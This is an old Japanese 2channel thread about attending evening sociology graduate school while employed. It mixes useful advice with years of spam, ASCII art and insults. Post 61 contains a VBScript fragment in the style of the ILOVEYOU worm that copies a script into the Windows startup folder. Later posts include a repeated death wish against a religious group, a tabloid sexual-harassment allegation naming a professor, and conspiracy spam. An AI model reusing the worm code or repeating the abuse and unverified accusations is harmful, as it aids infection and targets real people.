2ちゃんねる スマホ用 ■掲示板に戻る■ 全部 1- 最新50    

社会人で社会学の院にいってみたいのですが

1 :名無しさん@お腹いっぱい。:2001/05/14(月) 15:33 ID:1rCgCdfo.net
可能ですか?
夜間とかになっちゃうんでしょうか

2 :名無しさん@お腹いっぱい。:2001/05/14(月) 19:07 ID:n7TRlO.o.net
可能だとは思うけど、夜間はむしろ少ないんじゃないでしょうか。
社会学だと昼間開講の方が多いと思いますが。学部だったら、
早稲田に通学可能だけど、大学院の方は知りません。スマソ。

1さんは、夜間・昼間どっちの方に通いたいんですか?

3 :1:2001/05/14(月) 19:36 ID:gw6NPPjQ.net
できれば仕事に支障の無い夜間を

4 :名無しさん@お腹いっぱい。:2001/05/16(水) 20:23 ID:???.net
2>>1
そろそろ情報収集というか志望校選びをされた方がいいと思います。
大学によっては文学部の院になってしまう場合もあり、社会学専攻だと
探すのにちょっと手間が掛かるかも。

可能かどうかは、最終的に職場の了解を得られるか否かによるでしょう。
退職して契約社員や派遣社員になるとかの方法もあるけど、正社員で
6時前に退社できる職場はそうそう多くないですからね。

5 :わーい:2001/05/17(木) 03:24 ID:???.net
>1
早稲田の社会科学研究科がよろしいかと。もちろん社会学もありますよ。
半分は社会人の方ですし。
平日は授業が17:55〜 土曜は10:20〜
だいたい、社会人のかたは平日のゼミの時間(週1、2回)と、
土曜の授業(4〜5コマ)ってかたちで通われてます。
早稲田でよければ、いろいろアドヴァイスできるかも知れません。

6 :名無しさん@お腹いっぱい。:2001/05/19(土) 13:13 ID:GAtaLA5s.net
うっそ〜ん。早稲田でいいの?
というか、やりたいテーマをもっと絞ってから選べよ。

7 :名無し君:2001/05/20(日) 04:08 ID:???.net
>6
5は「よければ」っていってるだろ?
お前がどこの学校か知らんが詰まらん煽りやめろ厨房。

8 :名無しさん@お腹いっぱい。:2001/05/20(日) 20:57 ID:AtIqzgiQ.net
>7
クス。どういう読解力してるわけ?
早稲田はいい大学だけど、
やりたいテーマを満たしてくれる教官が
いるかどうかチェックしないと
不幸なことになるよっていう意味なのにね。
まわりでそういう不幸な社会人院生知ってるからね。

9 :日本アメリカ化計画:2001/05/20(日) 20:57 ID:Y0VI6HfY.net
A型は徒党を組んで国民を操ろうとする。注意せよ!
特に全国民の5%しかいないAA型は偏固で神経質。

10 :名無しさん@お腹いっぱい。:2001/05/20(日) 23:24 ID:???.net
>>9
市ね

11 :名無し君:2001/05/21(月) 11:42 ID:???.net
>8
クスクス。どういう表現力してるわけ?
誤解を招くのは当然だろ。

あと6のレスからして、読解力ないのは自分のほうだろうが。
なぜ5を読んでから6のようなレスを書く?
「うっそ〜ん」っておかしくないか?

12 :ななしさま:2001/05/21(月) 12:20 ID:5d3Q5vNg.net
僕もコンピューターを学べる工学系の大学の夜間にいきたいのですがよいとこありますか?

13 :8:2001/05/21(月) 12:33 ID:SvMFUp1o.net
>11
やっぱりレスきてたか。

ここは2ちゃんだぜ。
多少の言葉遊びを許す器の大きさはあってほしいもんだね。
それに学校名で向きになるようでは情けなさ過ぎる。
君の愛校心はわかってやってもいいけど、
それを露骨に出すのは無粋ってもんだ。

でだ。社会学でもいろいろある。
社会学のどの方面をやりたいのか絞った上で院を選ぶ必要がある。
でないと、入るのがどの院であれ、後悔する可能性がある。
高い金払ってまでして院いくのだから、これは考えたほうがいい。

14 :名無し君:2001/05/22(火) 05:43 ID:???.net
>13
やっぱりレスしてきたか。

自分がからかうのは許せても
他人にからかわれるのは我慢できないみたいだね。

それこそ無粋ってもんだろ???

君に言葉遊びを許す器の大きさがあるならもうやめようぜ。
これで解らんようだったら君の相手をした俺が馬鹿なんだろうな。

15 :名無しさん@お腹いっぱい。:2001/05/22(火) 08:41 ID:hHk0rcLo.net
>>1

「塩爺」が理事長をしていた大学には、夜間開講の社会学
大学院があります。

意志あるところに方法あり、だと思います。

16 :5:2001/05/22(火) 13:31 ID:???.net
>>6
1さんが仕事しながら通えるところを探しておられたから、
選択肢の1つとしてすすめてみたんですけど?
煽ってるとも思わないけど感じ悪いレスだね。

17 :斎藤守:2001/06/14(木) 14:28.net
当学院に一度ご相談ください。
http://www.chuo-school.ac/

18 :aaa:01/09/15 01:01.net
aaa

19 :名無しさん@お腹いっぱい。:01/09/15 05:43.net
社会人院生、いいんじゃないでしょうか?
正社員ともなるとちょっときついかも知れないけど
契約、派遣だったらできるでしょう。
それに社会学と言ってもかなり広範囲になるから
具体的に何を研究したいのか色々模索してみてください。
その結果によっては「社会学研究科」というところにこだわる必要はないのでは?
たとえば思想を研究したいなら文学研究科でも国際文化研究科でもいいし
具体的な制度や社会現象を研究したいなら政治学、法学、経済学、地域研究とか
色々考えられるかと思います。
えてして入ってから研究内容が変わったりすることもあるので
事前に行きたいところをピックアップして
そこの先生なり学生、職員の人に相談してもいいかもしれません。
それが億劫だったらメールを出したり、資料を受け取るとか。
今すぐにではないというなら、聴講生、科目履修生になって
講義を実際に受けてみてもいいでしょう。

夜間になるのは免れないかと思います。
昼間だと仕事に支障をきたすし
土曜の昼間ならいいかも知れません。

住んでる場所にも寄りますけど
あまり遠くになるのはお勧めできないかと思います。

以上、長文失礼。

20 :ひひひ:01/09/15 05:55.net
http://www.himawari.sakura.ne.jp/%7Eloveseat/Adu/index0.html

21 :判決:01/09/16 22:29.net
5 VS 6

5がまとも、6は馬鹿。
2ちゃんねるごときで自分の立場に破綻をきたす6は、
現実の社会でも自己評価と他人の評価との
ギャップとに苦しんでいるので、いつも「うまくいかない」
と苛立っている。受験勉強は多少うまくできた方なので、
理論武装はそれなりにできるのだが如何せんよりどころと
なる思想が貧弱。
「大学院」について質問しているのだから、「うっそーん」という
まったく遊べていない言葉遊びをツールとしてスレのスピードを
下げるのではなく、つまらないことしか思いつかないという自覚を
持って推移を見守る器量を持ってはいかが。
まぁ、がんばれ。

22 :名無し生涯学習:01/11/10 16:37.net
http://akasaka.cool.ne.jp/poonya13/index2.html

23 :グラダラハラ:02/01/13 04:02.net
会社は辞めない方が良いと思います。 僕は勤めながら 2年で修了できました。
テーマを固めてから院に入って、土曜と週2回くらいの通学で修了可能と思う。
今の時代、会社を辞めてはダメと思う。

24 :(・ε・)プップクプー :02/01/13 06:41.net
(・ε・)プップクプー

25 :二審:02/01/13 06:46.net
5 VS 6

6がまとも、5は馬鹿。
だいたい、自分の学校に対す表現が悪いと怒るのは、犬食いウリナラマンセーと同じ!

26 ::02/01/13 06:59.net
ヽ(´ー`)ノ逆転勝訴

27 :ポチ&ミケ:02/01/13 07:12.net
▽・w・▽わんわん  (=・ェ・=)みゃ〜
私たちを食べないで!

28 : :02/03/15 09:07.net
社会福祉なら結構ありますが。

29 :名無し生涯学習:02/07/29 15:35.net
立教もあるでしょう。観光学、異文化コミュニケーション
21世紀社会学って夜間の社会学大学院だよ。
興味のある教員がいればいいんじゃない?

30 :名無し生涯学習:02/09/26 23:11.net


            ∧_∧
     ∧_∧  (´<_`  )
     ( ´<_`) /   ⌒i  
    /   \     | |
    /    / ̄ ̄ ̄ ̄/ |
  __(__ニつ/  FMV  / .| .|____
      \/       / (u ⊃ 
        ̄ ̄ ̄ ̄ ̄


31 :名無し生涯学習:02/09/26 23:17.net
            ∧_∧
     ∧_∧  (´<_`  )
     ( ´ <_`) /   ⌒i  
    /   \     | |
    /    / ̄ ̄ ̄ ̄/ |
  __(__ニつ/  FMV  / .| .|____
      \/       / (u ⊃ 
        ̄ ̄ ̄ ̄ ̄


32 :山崎渉:03/01/06 07:19.net
(^^)

33 : ↑:03/01/14 01:16.net
 あんた一体だれ?

34 :名無し生涯学習:03/01/14 01:44.net
>>33 ♪ハナテン中古車センタ〜〜〜


35 :名無し生涯学習:03/01/14 02:01.net
>>34 あなた車売る?


36 :名無し生涯学習:03/01/16 00:30.net

 >>33-35 ワラタ









     ていうか、>>32って一体だれ?

37 :山崎渉:03/01/19 01:53.net
(^^)

38 :名無し生涯学習:03/02/14 18:57.net


39 :名無し生涯学習:03/03/03 01:08.net
>>33-35
?

40 :山崎渉:03/03/13 13:47.net
(^^)

41 :名無し生涯学習:03/03/13 14:32.net
http://www.isis.ne.jp/

http://www.maromaro.com/

http://www.tomita.net/

本を読もう


42 :山崎渉:03/04/17 08:50.net
(^^)

43 :山崎渉:03/04/20 03:26.net
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

44 :山崎渉:03/05/21 22:56.net
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

45 :山崎渉:03/05/28 13:53.net
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

46 :名無し生涯学習:03/06/08 12:15.net
日本変尿学院という予備校渋谷にあるけど風俗にかわったのか

47 :名無し生涯学習:03/06/09 13:45.net
編入学院はやばいからやめときな!

48 :名無し生涯学習:03/06/09 15:02.net
ぼけなす予備校!編入ガクエン

49 :名無し生涯学習:03/06/15 00:13.net
38歳だけど大学院に行きたい。

50 :名無し生涯学習:03/06/15 16:07.net
日本編入楽員逝けば・・

51 :山崎 渉:03/07/15 13:05.net

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

52 :2 ◆yh7/l3XPMM :03/07/25 08:23.net
>>24
禿同

はなし変わるけど、携帯ゲーム機"プレイステーションポータブル(PSP)

 このPSPは、新規格UMD(ユニバーサルメディアディスク)というディスクを利用しており、そのサイズは直径6cmととても小さい(CDの半分程度)。 容量は1.8GBとなっている。
画面は4.5インチのTFT液晶で、480px x 272px(16:9)。MPEG4の再生やポリゴンも表示可能。外部端子として、USB2.0とメモリースティックコネクタが用意されているという。

この際、スク・エニもGBAからPSPに乗り換えたらどうでしょう。スク・エニの場合、PSPの方が実力を出しやすいような気がするんですが。
任天堂が携帯ゲーム機で圧倒的なシェアをもってるなら、スク・エニがそれを崩してみるのもおもしろいですし。かつて、PS人気の引き金となったFF7のように。

突然へんなこと言い出してスマソ・・
GBAと比べてみてどうなんでしょうか?(シェア以外で)

53 :ぼるじょあ ◆yBEncckFOU :03/08/02 02:51.net
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

54 :山崎 渉:03/08/15 17:19.net
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

55 :名無し生涯学習:03/11/04 17:29.net
社会学なら佛大通信の院はどないだ?

56 :名無し生涯学習:04/01/12 11:46.net
日反編入学淫だけはオヤメナサイ

57 :名無し生涯学習:04/01/12 16:15.net
私のとこは、社会人大学院生が数名いますよ
勤務地と大学が近ければ可能だと思います

58 :名無し生涯学習:04/03/02 18:53.net



59 :名無し生涯学習:04/04/27 07:51.net
創価院がいい

60 :名無し生涯学習:04/06/02 18:35.net
そうかい

61 :名無し生涯学習:04/08/02 21:18.net
ttp//fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

62 :名無し生涯学習:04/08/08 23:47.net
age

63 :age:04/08/11 15:55.net
age

64 :名無し生涯学習:04/08/12 18:49.net
え?

65 :電脳プリオン:04/11/23 10:57:58.net
1はもう院は修了したのか?
|  |
| ‖>>43       Λ_Λ-__ 
| ‖         (・∀・)  ─_____ ___
|∧ 从ノ    (ミ_(⌒\ ヽ _ ___
( (≡ ̄ ̄ ̄ ̄三\ ⌒ノ ノ)
|(つWつ  ̄ ̄\  ⌒彡)   ノ =_
| \つ-つ    \,__,ノ ノ
|  | )      / / ≡=
|  |       / ノ      ____
|  |       /ノ _─ (´⌒(´
|  |      ミ/= (´⌒(´⌒;;
| ''''""'''"'''"""''"""'''''"'"''''""''"''''"""''"''"''"'''"'''''''"""''"''"''"'''"''"()
|  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|  |

66 :名無し生涯学習:04/11/24 19:39:43.net
h
http://www.teleport-sankuni.co.jp/~michiura/img/img-box/img20040419165145.jpg

67 :名無し生涯学習:04/11/28 15:24:46.net
このスレまだあったのか

68 :名無し生涯学習:05/02/17 03:33:15 .net
地方のバカ大学に東京から行って、九州の田舎モノたちに
散々バカにされて4年すごしました。慶應通教でもいって
ロンダしたい


69 :名無し生涯学習:2005/05/15(日) 14:06:18 .net
age


70 :名無し生涯学習:2005/08/04(木) 11:24:24 .net
母「おい、おまいら!!夕食ができますた。リビングに集合しる!」
父「詳細キボーヌ」
母「今日はカレーですが、何か?」
兄「カレーキターーーーーーーーー」
妹「キターーーーーーーーーー」
姉「カレーごときで騒ぐ奴は逝ってヨシ」
母「オマエモナー」
父 --------終了-------
兄 --------再開-------
妹「再開すなDQNが!それより肉うpキボンヌ」
母「ジャガイモうp」
姉「↑誤爆?」
兄「タマネギage」
父「ほらよ肉>家族」
妹「神降臨!!」
兄「タマネギage」
母「糞タマネギageんな!sageろ」
兄「タマネギage」
姉「タマネギage厨uzeeeeeeeeeeee!!」
母「ageって言ってればあがると思ってるヤシはDQN」
セールスマン「イタイ家族がいるのはこの家ですか?」
母「氏ね」
父「むしろゐ`」
兄「タマネギage」
妹「兄 、 必 死 だ な ( 藁 」

71 :名無し生涯学習:2006/01/03(火) 22:52:09 .net
 _, ,_
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \

負  け  犬  必  死  だ  な  w

72 :名無し生涯学習:2006/05/03(水) 21:58:20 .net
がんばれ

73 :名無し生涯学習:2006/09/28(木) 08:50:06 .net
行けば?

74 :名無し障害学習:2006/10/30(月) 21:27:12 .net
あげ

75 :名無し生涯学習:2007/02/06(火) 21:51:02 .net
社会学といえば、東洋、中央くらいか?



76 :49:2007/05/10(木) 22:56:13 .net
41歳だけど大学院に行きたい。

77 :名無し生涯学習:2007/05/11(金) 07:36:36 .net
>>76
逝ってらっしゃい

78 :名無し生涯学習:2007/06/27(水) 09:39:30 .net
【長妻の審議一分前に膨大な年金問題の資料を提出して悪質な嫌がらせをした自民党。】

平成19年5月11日(金曜日)厚生労働委員会
○長妻委員
 まず、これはちょっと政府には抗議を申し上げたいんですが、三カ月前に、消えた年金納付記録
の調査要請をしておりまして、二カ月前ですか、三月九日にしておりましたけれども、これは審議
の前までに出してほしいという資料でございましたが、何かきょうの理事会に出してきて、私がこ
れを手元にいただいたのは、今から一分前ですね。こんな膨大な資料を、今嫌がらせのようにとい
うか、直前に出してきて、読む暇がありませんので、これは委員長に御了解を得て、ちょっと休憩
にしていただきたいと思います。
○櫻田委員長 質問を続けてください。休憩の予定はございません。
ttp://www.shugiin.go.jp/itdb_kaigiroku.nsf/html/kaigiroku/009716620070511019.htm




79 :名無し生涯学習:2008/01/24(木) 10:36:14 .net
新ヒーロー登場!「 内 田 隆 三 」(ミシェル・フーコー 社会学)のスレッド立てお願い!

スレタイ例: 東大「有名教授【大学院総合文化研究科・内田隆三氏・57歳】」と女子学生「セックス裁判」の中身

http://kodansha.cplaza.ne.jp/wgendai/article/070402/top_04_01.html
スクープ 
8年にわたる「紛争」は泥沼化 処女だった教え子に過激なセクハラ、やがては性の奴隷に――と

東大「有名教授【大学院総合文化研究科・内田隆三氏・57歳】」と女子学生「セックス裁判」の中身

■原告が語ったワイセツ行為とセックス
■被告側はセクハラ冤罪を主張した
■師弟による終わりなき争いの行方

「酷ひどいセクハラを受けた」とする教え子とそれを全面的に否定する教授。180度違う証言をする両者の争いは、東大の学内でもほとんど知られることなく、えんえんと続いている。いったいどちらの主張が事実なのだろうか――。

「先生の授業は大教室でも満員状態。知識の量が圧倒的だし、マスコミにも詳しく、時事的なテーマも授業に盛りこむので、東大の女子学生に人気は高いです。看板教授の一人ですよ」


80 :名無し生涯学習:2008/03/07(金) 15:13:06 .net
,,.r'' ゛~~` ''ッ,,  釣りじゃない          )   )
                 、 ゛  ,,,,,,,,,,,,,,,,,,,,, ヾ.     ,.、    / /
                  ミ   ミ゛,へ.__, ,_ノヽ i.                .| |l   l ,´
                ミ    ミ, ( ・) {・フ 〉 ミ.          _-、i::| |ニニii '
            、,,,,ツi:     ミ,`~´ ヽ~〈  .ミ        /,‐ヽヽ`、||
          、シ``   i:      ,ゞ  'n.inヽ. .ミ          ( .〉〉/
         シ  //      ミ`    l.l ヽ"、         /  ノ
        ミ/ シ           彡 ,=こ二=.{ ミ,,      ,r'´ ,,、'゛
        ミi. /  /       ' ! w、`~^' vwv '、   ミ  




81 :名無し生涯学習:2008/03/09(日) 09:56:55 .net
息の長いスレだな


82 :名無し生涯学習:2008/03/15(土) 13:04:11 .net
釣乙

83 :名無し生涯学習:2008/07/04(金) 12:01:59 .net
放送いいよ

84 :名無し生涯学習:2008/08/18(月) 15:06:37 .net
放送いいよ

85 :名無し生涯学習:2008/10/03(金) 18:10:44 .net
放送いいよ

86 :名無し生涯学習:2008/11/22(土) 02:59:49 .net






87 :名無し生涯学習:2009/01/28(水) 13:58:32 .net
放送いいよ

88 :産能卒業生:2009/01/31(土) 14:26:01 .net
惨脳クビになって中傷したとして裁判で450マソ賠償請求された自称社長の玉木が、「社会学はトンデモ」とほざいてたな。
麻布中高、東大で一緒だた首都大学東京の宮台真司准教授が、社会学者で、援助交際していて、同棲していた
(手塩にかけたくろたまと、同棲していたからという理由で縁を切った)から、そのすべてを忌み嫌う。

89 :名無し生涯学習:2009/02/12(木) 00:58:02 .net
放送いいよ

90 :名無し生涯学習:2009/02/12(木) 01:25:08 .net
>>88
何をいってるのかサッパリわからん・・・
産能はこんな馬鹿でも卒業させるんだな。

91 :名無し生涯学習:2009/02/12(木) 18:02:48 .net
>>88
日本語でおkってレベルじゃねえぞ。

>そのすべてを忌み嫌う。

表現力豊かにふるまいたいのはわかるけど、なにその表現w
どうせ低俗な漫画からの引用なんだろうけど、そういうのがカコイイと勘違いしているのかしら。


92 :名無し生涯学習:2009/02/12(木) 18:19:17 .net
通教生の中でも、特に産能は日本語のおかしな香具師は多いよな。
産能スレみても、みんな勉強してないのが丸わかり。

93 :名無し生涯学習:2009/02/18(水) 02:08:51 .net
放送いいよ

94 :名無し生涯学習:2009/02/22(日) 09:53:04 .net
放送いいよ

95 :名無し生涯学習:2009/02/25(水) 02:37:17 .net
放送いいよ

96 :名無し生涯学習:2009/02/28(土) 02:02:42 .net
放送いいよ

97 :名無し生涯学習:2009/03/02(月) 01:28:41 .net
放送いいよ

98 :名無し生涯学習:2009/03/10(火) 19:11:55 .net
放送いいよ

99 :名無し生涯学習:2009/03/13(金) 00:33:13 .net
放送いいよ

100 :名無し生涯学習:2009/03/14(土) 12:53:00 .net
このスレ八年も前からあるのか

101 :名無し生涯学習:2009/03/29(日) 08:36:46 .net
放送いいよ

102 :名無し生涯学習:2009/04/05(日) 17:09:47 .net
放送いいよ

103 :名無し生涯学習:2009/04/07(火) 01:18:57 .net
放送いいよ

104 :名無し生涯学習:2009/04/22(水) 09:14:34 .net
放送いいよ

105 :名無し生涯学習:2009/04/23(木) 12:36:22 .net
放送いいよ

106 :名無し生涯学習:2009/04/24(金) 20:38:29 .net
しつこいんだよ、意味不明だし。

107 :名無し生涯学習:2009/05/18(月) 22:49:49 .net
放送いいよ

108 :名無し生涯学習:2009/05/20(水) 23:51:19 .net
放送いいよ

109 :名無し生涯学習:2009/06/10(水) 11:50:03 .net
放送いいよ

110 :名無し生涯学習:2009/06/12(金) 09:34:43 .net
放送いいよ

111 :名無し生涯学習:2009/06/22(月) 09:42:08 .net
放送いいよ

112 :名無し生涯学習:2009/07/08(水) 00:30:06 .net
放送いいよ

113 :名無し生涯学習:2009/08/31(月) 07:49:16 .net
放送いいよ

114 :名無し生涯学習:2009/09/17(木) 09:48:28 .net
放送いいよ

115 :名無し生涯学習:2009/09/25(金) 11:14:34 .net
放送いいよ

116 :名無し生涯学習:2009/09/27(日) 01:44:22 .net
放送いいよ

117 :名無し生涯学習:2009/10/07(水) 10:32:28 .net
放送いいよ

118 :名無し生涯学習:2009/10/14(水) 04:12:18 .net
放送いいよ

119 :名無し生涯学習:2009/10/18(日) 00:22:36 .net
放送いいよ

120 :名無し生涯学習:2009/10/24(土) 03:40:01 .net
放送いいよ

121 :名無し生涯学習:2009/11/10(火) 00:40:34 .net
放送いいよ

122 :名無し生涯学習:2009/12/04(金) 18:57:51 .net
放送いいよ

123 :名無し生涯学習:2009/12/21(月) 23:19:54 .net
某旧帝大だけど、去年大量に社会人院生が入ってきた。
入ってきただけならいいけど、レベル低すぎなので大変。
英語もろくに読めない、統計わからない、論理的思考はできない、
そのくせプライドだけは高くて、自分の経験や主観で物事を語る。
もはや議論が成立しない。
まあ私は今年で博論提出して脱出するからいいけど、
残された連中は大変だろうな…。
たぶんこんな状態になっている院が世の中にはたくさんあることだろう。

124 :名無し生涯学習:2010/01/07(木) 13:19:48 .net
放送いいよ

125 :名無し生涯学習:2010/01/28(木) 13:37:01 .net
>>123
何か月前にレスするのw・・・だけど、
放送大のスクでもいるわ、そういう方達。
私は社会心理学を勉強したいのですが、院希望している方が多くて驚きました。
子供も手が離れて時間はあるのだろうけど、通学するお金が、あるところには
あるのだな〜と。正直うらやましいのです。

ただ、グループ学習で自分の飛んでも考えを延々と話すだけの人が院?
院って自己満足なのか?

126 :名無し生涯学習:2010/01/30(土) 01:55:31 .net
放送いいよ

127 :名無し生涯学習:2010/02/16(火) 13:30:38 .net
放送いいよ

128 :名無し生涯学習:2010/02/25(木) 15:43:26 .net
放送いいよ

129 :名無し生涯学習:2010/04/09(金) 10:06:46 .net
放送いいよ

130 :名無し生涯学習:2010/04/26(月) 14:59:38 .net
放送いいよ

131 :名無し生涯学習:2010/05/26(水) 10:34:03 .net
放送いいよ

132 :名無し生涯学習:2010/06/09(水) 04:06:58 .net
>>1
やめとけ

133 :名無し生涯学習:2010/06/23(水) 13:55:12 .net
放送いいよ

134 :名無し生涯学習:2010/06/25(金) 23:09:19 .net
ニューポート大学の情報

 http://newport-university.cocolog-nifty.com/blog/


135 :名無し生涯学習:2010/07/13(火) 21:55:30 .net
202 :名無し生涯学習:2009/05/18(月) 22:48:45
放送以外は行く意味無いよ

203 :名無し生涯学習:2009/05/19(火) 09:20:31
放大院いって大学の先生になれますか?過去の実績は?

204 :名無し生涯学習:2009/05/20(水) 23:50:36
放送以外は行く意味無いよ

205 :名無し生涯学習:2009/05/21(木) 00:00:16
博士課程がない放送大学では、大学教員は厳しい。

206 :名無し生涯学習:2009/05/21(木) 16:50:36
修士号しか持ってない教授はたくさんいる

207 :生涯学習の名無しさん:2009/05/21(木) 22:09:14
年齢にもよりますが、キャリアアップを目指すならとてもよい。
定年退職後、研究生活を楽しむなら最高!
学ぶことから得られるものは無尽蔵と言えます。

208 :名無し生涯学習:2009/05/24(日) 23:36:30
>>205
あほか。それは「過去に」教員になった人でしょ。
今公募を勝ち抜くのに博士持ってないなんてはなから論外。
よって放大では駄目だね。

136 :名無し生涯学習:2010/09/10(金) 04:25:25 .net
放送いいよ

137 :名無し生涯学習:2010/10/16(土) 03:28:16 .net
放送いいよ

138 :名無し生涯学習:2010/10/31(日) 13:54:16 .net
放送いいよ

139 :名無し生涯学習:2010/11/11(木) 21:20:08 .net
放送いいよ

140 :名無し生涯学習:2010/11/25(木) 17:30:49 .net
放送いいよ

141 :郵便局員と結婚する女は、一生、不幸せなんだよw:2010/11/25(木) 22:35:28 .net

代々木にある
社会人の予備校(某a学院)行ってみたけど
高すぎ。

40万以上払わされた

しかも、授業が古いし意味ないし
最悪だった

142 :名無し生涯学習:2010/12/03(金) 16:18:18 .net
放送いいよ

143 :名無し生涯学習:2011/01/12(水) 06:31:31 .net
放送いいよ

144 :名無し生涯学習:2011/01/20(木) 22:53:04 .net
放送いいよ

145 :名無し生涯学習:2011/01/24(月) 01:07:15 .net
放送いいよ

146 :名無し生涯学習:2011/01/24(月) 12:39:21 .net
放送いいよ

147 :名無し生涯学習:2011/01/30(日) 07:10:19 .net
放送いいよ

148 :名無し生涯学習:2011/02/03(木) 23:33:20 .net
放送いいよ

149 :名無し生涯学習:2011/02/18(金) 22:46:10 .net
放送いいよ

150 :名無し生涯学習:2011/02/19(土) 20:17:19.83 .net
やっぱり
だよな

151 :名無し生涯学習:2011/03/15(火) 20:18:30.61 .net
放送いいよ

152 :名無し生涯学習:2011/03/23(水) 22:02:26.66 .net
放送いいよ

153 :名無し生涯学習:2011/03/24(木) 03:01:59.96 .net
10年弱で150足らずのスレってwwwwwww

154 :名無し生涯学習:2011/04/02(土) 20:30:35.52 .net
放送いいよ

155 :名無し生涯学習:2011/04/21(木) 04:26:47.34 .net
放送いいよ

156 :名無し生涯学習:2011/05/12(木) 00:56:07.34 .net
>>5早稲田の社会「科学」って社会学そのものもやってるの?
なんか経済や法学、政治学を廣く浅く学ぶもんだと思ってた。
社会学単独に集中するには文学部社会学系の方が合ってんじゃない?

あと、社会人ということを考えての夜間なんだろうけど、夜間って私大だけだろ。
ただ万が一アカポス目指すんだったら、昼間も考えた方が良いかと。
正直研究者養成機関と言い難い私大も多い。
1は昼間が可能なら早慶レベルの他、東大や一橋みたいな国立の院も考えてみてはどうだろ。
逆に単に社会学やりたいってだけなら、むしろ放大なんかの通信制でことたりるのでは。

157 :名無し生涯学習:2011/05/14(土) 20:02:43.77 .net
僕も社会学学びたいよ

158 :名無し生涯学習:2011/07/14(木) 13:35:37.03 .net
放送いいよ

159 :名無し生涯学習:2012/10/06(土) 05:25:18.27 .net
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね 
そうかタヒね
そうかタヒね 
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね


160 :名無し生涯学習:2013/11/28(木) 08:57:15.12 .net
愛媛県警の裏金を内部告発した仙波敏郎さん

市民の方と接触している最高の権力機関は警察ですよね?その警察が・・・・全部ですよ?
100パーセント裏金にもう汚染されている
町のお巡りさんから高級官僚から上から下まで全部

私が今まで、25の都道府県で、97回の裏金公演をしてきましたが、そこで必ず最初に話す事は、

日本というこの国の中で、いろんな団体、組織、企業、官公庁、ありますね?
その中で、日常の通常勤務を通じて犯罪を行っているのは、ヤクザと警察であると。

@ http://www.youtube.com/watch?v=4VqhLhDaY_8
A http://www.youtube.com/watch?v=tLRad9GzRKQ
B http://www.youtube.com/watch?v=iH__VZcrfnQ
C http://www.youtube.com/watch?v=-pTwx9RdCSg
D http://www.youtube.com/watch?v=EhRV2eqwiVo
E http://www.youtube.com/watch?v=Tf5ZNiruFxA
F http://www.youtube.com/watch?v=XILnF0KNCSs
G http://www.youtube.com/watch?v=wSbGp4Ak8CM
H http://www.youtube.com/watch?v=pSbQ5bj5Rs0
I http://www.youtube.com/watch?v=PtOWtyjyyg0
J http://www.youtube.com/watch?v=PwOgDp9fcg8
K http://www.youtube.com/watch?v=0JmiEq2lgYc
L http://www.youtube.com/watch?v=ysKe5T7HzaM

161 :名無し生涯学習:2014/03/27(木) 14:32:59.20 .net
いってみたいのですが

162 :名無し生涯学習:2014/04/03(木) 15:46:16.51 .net
社会学やって何に役立てたいのかな?

163 :名無し生涯学習:2014/04/11(金) 16:57:04.53 .net
>>1
夜間になるかどうかは貴方の勤務がどういうものか次第だと思いますが。

164 :名無し生涯学習:2014/05/06(火) 18:59:45.27 .net
 
http://atsites.jp/sate/set/mediation/mediation.html
 
 【 付きうごき者 】
 
彼等の室内での心理状態、行動様態、気分の抑揚などは常に隣人の生活様態に左右、依拠され、
それら隣人の生活様態を自らの諸行動,諸動作の契機として、
あるいはまたスケジュール表か時計かのごとくに借用しながらの生活を送る。

付きうごきの感知は 自己の動作のあと1、2秒遅れて床から伝わってくる「ピクッ」とするわずかな振動から確認することができる。
 
  = 付きうごきの3型 =
・通常の場合
・付きうごきに対して注意喚起を促した後に逆恨みからその行為をより一層徹底、強力化してやり返してくるもの  〔付きかえし〕
・注意喚起時に他の部屋の別の引きこもり者が自分のことを指摘されたのだと思い込みやり返してくるケース  〔勘違い型付きかえし〕
 (パチンコ屋などで「警察だ!」と叫べば身に覚えのある何人かがギョッとして逃げ出そうとすることと同様に)
 http://rfi.a.la9.jp/hn203/k203/k.png
 http://rfi.a.la9.jp/hn203/k203/k203_1.png
 http://rfi.a.la9.jp/hn203/k203/k203_2.png
・ウィークリーマンションなどに入っている引きこもり者どうしが、あるいは他の普通の客も巻き込みながら付き返しの応酬となっているケース  〔やみくも型付きかえし〕
 
寝起きする住居であるから被害者はこれを避けることはできず、不愉快と時間、人生の浪費を強いられざるを得ない。
 
http://atsites.jp/sate/set/correspondence/correspondence-6/correspondence-6.html
http://atsites.jp/sate/set/correspondence/correspondence-1/correspondence-1.html

165 :名無し生涯学習:2014/05/06(火) 19:05:38.86 .net
 
http://atsites.jp/sate/set/Avatar_set/Avatar_set-1.html
http://atsites.jp/sate/set/Prometheus_set/Prometheus_set-1.html
 
この付きかえしは引きこもりニーホがその特質「何もすることがない」ということを最大の武器に異様な執着と異常な頻度で
及んで来るものである。
 
■何でもない人たち = ニーホ
 戦後復興、高度経済成長以降の日本人のうち労働意欲、遊興意欲ともに乏しく、何に対しても興味が薄く消極的な人々。
 これといってやるべきこと、特にやりたいことなどを持たず、無為に日々、人生を送る。
